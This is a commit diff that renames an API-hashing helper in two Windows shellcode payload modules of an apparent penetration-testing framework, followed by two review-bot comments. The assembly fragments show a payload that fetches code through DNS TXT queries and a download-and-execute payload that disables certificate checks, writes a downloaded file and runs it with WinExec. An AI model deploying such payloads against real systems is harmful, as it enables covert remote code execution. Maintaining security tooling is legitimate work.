

fix(payloads): fixing typo on block-api hashing function
dledda-r7 committed Nov 26, 2024
1 parent 523b7fa commit 170fec3
Showing 2 changed files with 14 additions and 14 deletions.
6 changes: 3 additions & 3 deletions modules/payloads/singles/windows/dns_txt_query_exec.rb
Expand Up @@ -89,7 +89,7 @@ def generate(_opts = {})
push eax ; flAllocationType MEM_COMMIT (0x1000)
push eax ; dwSize (0x1000)
push 0x0 ; lpAddress
push #{Rex::Text.hash("kernel32.dll", "VirtualAlloc")} ; kernel32.dll!VirtualAlloc
push #{Rex::Text.block_api_hash("kernel32.dll", "VirtualAlloc")} ; kernel32.dll!VirtualAlloc
call ebp
push eax ; save pointer on stack, will be used in memcpy
mov #{bufferreg}, eax ; save pointer, to jump to at the end
Expand All @@ -103,7 +103,7 @@ def generate(_opts = {})
push eax ; Push 'dnsapi' to the stack
push 0x61736e64 ; ...
push esp ; Push a pointer to the 'dnsapi' string on the stack.
push #{Rex::Text.hash("kernel32.dll", "LoadLibraryA")} ; kernel32.dll!LoadLibraryA
push #{Rex::Text.block_api_hash("kernel32.dll", "LoadLibraryA")} ; kernel32.dll!LoadLibraryA
call ebp ; LoadLibraryA( "dnsapi" )
;prepare for loop of queries
Expand All @@ -126,7 +126,7 @@ def generate(_opts = {})
push #{queryoptions} ; Options
push #{wType} ; wType
push eax ; lpstrName
push #{Rex::Text.hash("dnsapi.dll", "DnsQuery_A")} ; dnsapi.dll!DnsQuery_A
push #{Rex::Text.block_api_hash("dnsapi.dll", "DnsQuery_A")} ; dnsapi.dll!DnsQuery_A
call ebp ;
test eax, eax ; query ok ?
jnz jump_to_payload ; no, jump to payload
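Review bot: The three replaced `push #{Rex::Text.block_api_hash(...)}` lines in this file are only evaluated when the payload is generated, so a misspelled helper name here (as the replaced `Rex::Text.hash` presumably was) surfaces as an exception inside `generate` at runtime rather than at load or lint time. If the module spec does not already call `generate` once, a smoke test that builds the payload and asserts the returned buffer is non-empty would catch this class of regression cheaply, since no target or network is involved. The interpolated values are emitted as plain integers into the Metasm source, which is consistent with the rest of the file. `generate` itself begins before the first hunk and continues past the last one.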
22 changes: 11 additions & 11 deletions modules/payloads/singles/windows/download_exec.rb
Expand Up @@ -136,7 +136,7 @@ def generate(_opts = {})
push 0x696e6977 ; ...
mov esi, esp ; Save a pointer to wininet
push esp ; Push a pointer to the "wininet" string on the stack.
push #{Rex::Text.hash('kernel32.dll', 'LoadLibraryA')} ; hash( "kernel32.dll", "LoadLibraryA" )
push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "wininet" )
internetopen:
Expand All @@ -146,7 +146,7 @@ def generate(_opts = {})
push edi ; LPCTSTR lpszProxyName
push edi ; DWORD dwAccessType (PRECONFIG = 0)
push esi ; LPCTSTR lpszAgent ("wininet\x00")
push #{Rex::Text.hash('wininet.dll', 'InternetOpenA')} ; hash( "wininet.dll", "InternetOpenA" )
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')} ; hash( "wininet.dll", "InternetOpenA" )
call ebp
jmp.i8 dbl_get_server_host
Expand All @@ -162,7 +162,7 @@ def generate(_opts = {})
push #{port_nr} ; PORT
push ebx ; HOSTNAME
push eax ; HINTERNET hInternet
push #{Rex::Text.hash('wininet.dll', 'InternetConnectA')} ; hash( "wininet.dll", "InternetConnectA" )
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetConnectA')} ; hash( "wininet.dll", "InternetConnectA" )
call ebp
jmp.i8 get_server_uri
Expand All @@ -178,7 +178,7 @@ def generate(_opts = {})
push ecx ; url
push edx ; method
push eax ; hConnection
push #{Rex::Text.hash('wininet.dll', 'HttpOpenRequestA')} ; hash( "wininet.dll", "HttpOpenRequestA" )
push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')} ; hash( "wininet.dll", "HttpOpenRequestA" )
call ebp
mov esi, eax ; hHttpRequest
Expand All @@ -194,7 +194,7 @@ def generate(_opts = {})
push eax ; &dwFlags
push 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
push esi ; hRequest
push #{Rex::Text.hash('wininet.dll', 'InternetSetOptionA')} ; hash( "wininet.dll", "InternetSetOptionA" )
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
httpsendrequest:
Expand All @@ -204,7 +204,7 @@ def generate(_opts = {})
push edi ; dwHeadersLength
push edi ; headers
push esi ; hHttpRequest
push #{Rex::Text.hash('wininet.dll', 'HttpSendRequestA')} ; hash( "wininet.dll", "HttpSendRequestA" )
push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')} ; hash( "wininet.dll", "HttpSendRequestA" )
call ebp
test eax,eax
jnz create_file
Expand Down Expand Up @@ -236,7 +236,7 @@ def generate(_opts = {})
push 2 ; dwShareMode
push 2 ; dwDesiredAccess
push edi ; lpFileName
push #{Rex::Text.hash('kernel32.dll', 'CreateFileA')} ; kernel32.dll!CreateFileA
push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')} ; kernel32.dll!CreateFileA
call ebp
download_prep:
Expand All @@ -253,7 +253,7 @@ def generate(_opts = {})
push eax ; read length
push ecx ; target buffer on stack
push esi ; hRequest
push #{Rex::Text.hash('wininet.dll', 'InternetReadFile')} ; hash( "wininet.dll", "InternetReadFile" )
push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} ; hash( "wininet.dll", "InternetReadFile" )
call ebp
test eax,eax ; download failed? (optional?)
Expand All @@ -271,20 +271,20 @@ def generate(_opts = {})
lea eax,[esp+0xc] ; get pointer to buffer
push eax ; lpBuffer
push ebx ; hFile
push #{Rex::Text.hash('kernel32.dll', 'WriteFile')} ; kernel32.dll!WriteFile
push #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')} ; kernel32.dll!WriteFile
call ebp
sub esp,4 ; set stack back to where it was
jmp.i8 download_more
close_and_run:
push ebx
push #{Rex::Text.hash('kernel32.dll', 'CloseHandle')} ; kernel32.dll!CloseHandle
push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')} ; kernel32.dll!CloseHandle
call ebp
execute_file:
push 0 ; don't show
push edi ; lpCmdLine
push #{Rex::Text.hash('kernel32.dll', 'WinExec')} ; kernel32.dll!WinExec
push #{Rex::Text.block_api_hash('kernel32.dll', 'WinExec')} ; kernel32.dll!WinExec
call ebp
thats_all_folks:
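Review bot: The end-of-line comments on the rewritten `push` lines in the first six hunks of this file still read `; hash( "kernel32.dll", "LoadLibraryA" )`, `; hash( "wininet.dll", "InternetOpenA" )` and so on, while the code now calls `block_api_hash`, so each comment names a helper the line no longer uses. The later hunks in the same file (CreateFileA, WriteFile, CloseHandle, WinExec) already use the shorter `; kernel32.dll!CreateFileA` form, so the LoadLibraryA line could become `push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} ; kernel32.dll!LoadLibraryA` with the InternetOpenA through InternetReadFile lines changed the same way. This is a wording change only; the pushed hash values are unaffected. `generate` begins before the first hunk and ends after the last one.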

